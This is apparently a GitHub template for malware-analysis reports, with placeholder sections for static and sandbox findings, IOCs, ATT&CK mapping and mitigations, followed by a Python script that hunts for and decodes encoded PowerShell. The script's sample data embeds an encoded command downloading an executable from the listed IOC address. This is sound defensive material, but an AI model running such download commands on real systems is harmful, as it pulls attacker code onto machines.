rsk-cyber/Malware-Investigation-Analysis

GitHub: rsk-cyber/Malware-Investigation-Analysis


# {{Malware Sample Name}} – Malware Analysis Report

**{{Brief description of the sample – e.g., "AsyncRAT trojan delivered via phishing email with fake invoice lure."}}**

## 📸 Screenshots

![Sample icon or properties](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{sample-icon.png}})
![File properties](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{file-properties.png}})

## 🔍 Static Analysis

### Strings (Interesting)

| String | Relevance |
|--------|-----------|
| `{{C2 domain or IP}}` | Potential command & control |
| `{{powershell -enc ...}}` | Encoded execution |
| `{{Registry key path}}` | Persistence mechanism |
| `{{Mutex name}}` | Anti-sandbox / single instance |

### PE Headers (if applicable)

| Field | Value |
|-------|-------|
| Entry Point | `{{0x...}}` |
| Compile Timestamp | `{{YYYY-MM-DD}}` |
| Sections (Name, Virtual Size, Entropy) | `.text`, `.rdata`, `.data` |
| Imports | `{{kernel32.dll, user32.dll, etc.}}` |

### VirusTotal / MalwareBazaar Results

![VirusTotal detection summary](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{vt-summary.png}})

| Vendor | Detection Name |
|--------|----------------|
| {{e.g., CrowdStrike}} | {{trojan.msil/scarsi}} |
| {{...}} | {{...}} |

## 🧪 Dynamic Analysis (Sandbox Detonation)

**Sandbox used:** {{Joe Sandbox / Cuckoo / ANY.RUN / CAPE}}

**Report link:** {{URL}}

- **Processes created:** `{{D41tYapPDr.exe}}` → `{{powershell.exe -enc ...}}` → `{{conhost.exe}}`
- **Process injection:** {{Code injected into suspended process / hollowing detected}}
- **File system changes:** Dropped `{{%AppData%\Roaming\Vlevqbxvsx\Kjcrsvxp.exe}}`
- **Registry changes:** Created `{{HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Kjcrsvxp}}`
- **Network activity:**
  - HTTP GET to `{{http://107.175.247.199/loader/install.exe}}`
  - C2 beacon to `{{107.175.247.199:443}}`
- **Persistence mechanism:** {{Registry run key / scheduled task / startup folder}}
- **Anti-analysis techniques detected:** {{Check for sandbox, debugger, VM, sleep obfuscation}}

![Process tree](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{process-tree.png}})
![Registry changes](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{registry-changes.png}})
![Network traffic](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{network-traffic.png}})

## 🧠 Indicators of Compromise (IOCs)

| Type | Indicator |
|------|-----------|
| **MD5** | `{{34793C6520DCF3C6130DC031FA640C71}}` |
| **SHA-1** | `{{...}}` |
| **SHA-256** | `{{...}}` |
| **IPv4** | `{{107.175.247.199}}` |
| **Domain** | `{{malicious[.]top}}` |
| **URL** | `{{http://107.175.247.199/loader/install.exe}}` |
| **Registry Key** | `{{HKCU\...\Run\Kjcrsvxp}}` |
| **File Path** | `{{%AppData%\Roaming\Vlevqbxvsx\Kjcrsvxp.exe}}` |
| **Mutex** | `{{Global\...}}` |

## 🎯 MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name | Observed Behavior |
|--------|--------------|----------------|-------------------|
| Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | `powershell -enc` executed |
| Persistence | T1547.001 | Registry Run Keys / Startup Folder | Run key created |
| Defense Evasion | T1027 | Obfuscated Files or Information | Base64-encoded PowerShell |
| Defense Evasion | T1055 | Process Injection | Injected into suspended process |
| Discovery | T1082 | System Information Discovery | Queries computer name, OS version |
| Command & Control | T1071.001 | Application Layer Protocol: Web Protocols | HTTP beacon to C2 |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | Data sent via C2 |

![MITRE ATT&CK Navigator](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{mitre-layer.png}})

## 🛡️ Mitigation Recommendations

- [ ] **Block IOCs** – Add all hashes to endpoint AV/EDR, block the C2 IP/domain at the firewall, quarantine dropped files.
- [ ] **Scope the environment** – Search the entire network for IOCs: file hash, registry key, process names, network connections to `{{107.175.247.199}}`.
- [ ] **Remove persistence** – Delete registry run key `{{HKCU\...\Run\Kjcrsvxp}}` and kill any related processes.
- [ ] **Email gateway** – Block sender infrastructure and any emails containing the malicious URL.
- [ ] **User awareness** – Train users to recognize phishing lures (e.g., fake invoices) even when the sender appears legitimate.
- [ ] **EDR hunting** – Query for the `-enc` flag in PowerShell command lines and for processes creating suspended child processes.

## 📈 Lessons Learned & Reflection

- **What worked well:** {{Sandbox quickly identified injection and persistence; VirusTotal gave a high detection rate.}}
- **What could be improved:** {{Automate decoding of PowerShell -enc strings; integrate C2 IP blocking into SOAR.}}
- **Key takeaway for SOC:** {{Even simple-looking executables can be sophisticated RATs. Always sandbox and check registry changes.}}

## 🔗 References & Tools Used

- **Sandbox:** {{Joe Sandbox / ANY.RUN / CAPE}}
- **VirusTotal:** {{link}}
- **Malpedia / Triage:** {{link}}
- **CyberChef:** {{link}}
- **PEStudio / Detect It Easy:** {{link}}
- **ProcMon / Wireshark:** {{link}}

*Template last updated: {{YYYY-MM-DD}}*
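The "EDR hunting" step and the "automate decoding of PowerShell -enc strings" improvement in the template, as an added Python example that is not part of the template or the repository: it pulls `-EncodedCommand` arguments out of process-creation events, decodes them (base64 over UTF-16LE, the encoding powershell.exe uses) and checks the decoded text against the report's IPv4 indicator. The `image|command line` event format, the sample command lines and all function names are assumptions made for this example.

```python
import base64
import re

def to_encoded_command(ps):
    """Build a -EncodedCommand argument the way PowerShell expects it: UTF-16LE text, then base64."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events in a minimal "image|command line" form
# (an assumption for this example, not telemetry from any real report).
SAMPLE_EVENTS = [
    r"C:\Users\victim\D41tYapPDr.exe|D41tYapPDr.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc "
    + to_encoded_command("Get-ComputerInfo | Select-Object CsName, OsVersion"),
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ExecutionPolicy Bypass -File update.ps1",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -EC "
    + to_encoded_command("Invoke-WebRequest -Uri http://107.175.247.199/loader/install.exe"),
]
IOC_IPS = {"107.175.247.199"}  # IPv4 indicator from the report's IOC table

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# this pattern covers the common spellings without matching -ExecutionPolicy.
ENC_RE = re.compile(r"(?i)(?<!\S)-e(?:c|nc[a-z]*)?\s+([A-Za-z0-9+/=]+)")

def extract_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or not valid base64 / UTF-16LE."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def hunt(events, ioc_ips):
    """Flag encoded PowerShell (T1059.001 + T1027) and list report IOCs found in the decoded text."""
    findings = []
    for event in events:
        image, _, cmdline = event.partition("|")
        decoded = extract_encoded_command(cmdline)
        if decoded is None:
            continue  # plain command lines are left to other detections
        findings.append({"image": image, "decoded": decoded,
                         "ioc_hits": sorted(ip for ip in ioc_ips if ip in decoded)})
    return findings

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, IOC_IPS):
        print(f["image"], "->", f["decoded"], "| IOC hits:", f["ioc_hits"])
```

Feeding real EDR process-creation telemetry through `hunt` gives the decoded command line next to the IOC match, which is the triage view the "Automate decoding" item asks for.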